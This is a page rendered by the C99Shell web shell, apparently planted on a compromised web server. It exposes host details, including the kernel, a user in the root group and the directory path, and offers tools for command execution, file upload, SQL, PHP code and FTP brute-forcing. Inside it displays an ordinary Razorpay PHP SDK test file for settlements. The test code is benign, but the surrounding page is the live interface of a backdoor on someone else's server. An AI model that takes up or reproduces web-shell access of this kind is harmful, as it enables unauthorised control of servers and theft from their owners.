!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html/vendor/razorpay/razorpay/tests/   drwxr-xr-x
Free 29.24 GB of 117.98 GB (24.78%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     SettlementTest.php (2.52 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Razorpay\Tests;

use 
Razorpay\Api\Request;

class 
SettlementTest extends TestCase
{
    
/**
     * Specify unique settlement id
     * for example : setl_IAj6iuvvTATqOM 
     */

    
private $settlementId =  "setl_IAj6iuvvTATqOM";

    public function 
setUp(): void
    
{
        
parent::setUp();
    }

    
/**
     * Create on-demand settlement
     */
    
public function testCreateOndemandSettlement()
    {
      
$data $this->api->settlement->createOndemandSettlement(array("amount"=> 1221"settle_full_balance"=> false"description"=>"Testing","notes" => array("notes_key_1"=> "Tea, Earl Grey, Hot","notes_key_2"=> "Tea, Earl Grey… decaf.")));
      
      
$this->assertTrue(is_array($data->toArray()));

      
$this->assertTrue(in_array('settlement.ondemand',$data->toArray()));
    }
    
    
/**
     * Fetch all settlements
     */
    
public function testAllSettlements()
    {
        
$data $this->api->settlement->all();

        
$this->assertTrue(is_array($data->toArray()));
        
        
$this->assertTrue(in_array('collection',$data->toArray()));
    }

    
/**
     * Fetch a settlement
     */
    
public function testFetchSettlement()
    {
        
$data $this->api->settlement->fetch($this->settlementId);
        
        
$this->assertTrue(is_array($data->toArray()));

        
$this->assertTrue(in_array('settlement',$data->toArray()));
    }

    
/**
     * Settlement report for a month
     */
    
public function testReports()
    {
        
$data $this->api->settlement->reports(array("year"=>2021,"month"=>9));

        
$this->assertTrue(is_array($data->toArray()));

    }

    
/**
     * Settlement recon
     */
    
public function testSettlementRecon()
    {
        
$data $this->api->settlement->settlementRecon(array('year' => 2021'month' => 9));

        
$this->assertTrue(is_array($data->toArray()));

        
$this->assertArrayHasKey('items',$data);
    }
   
    
/**
     * Fetch all on-demand settlements
     */
    
public function testFetchAllOndemandSettlement()
    {
        
$data $this->api->settlement->fetchAllOndemandSettlement();

        
$this->assertTrue(is_array($data->toArray()));

        
$this->assertTrue(is_array($data['items']));
    }

    
/**
     * Fetch on-demand settlement by ID
     */
    
public function testFetchAllOndemandSettlementById()
    {
        
$data $this->api->settlement->fetch($this->settlementId)->TestFetchAllOndemandSettlementById();

        
$this->assertTrue(is_array($data->toArray()));

        
$this->assertTrue(is_array($data['items']));
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--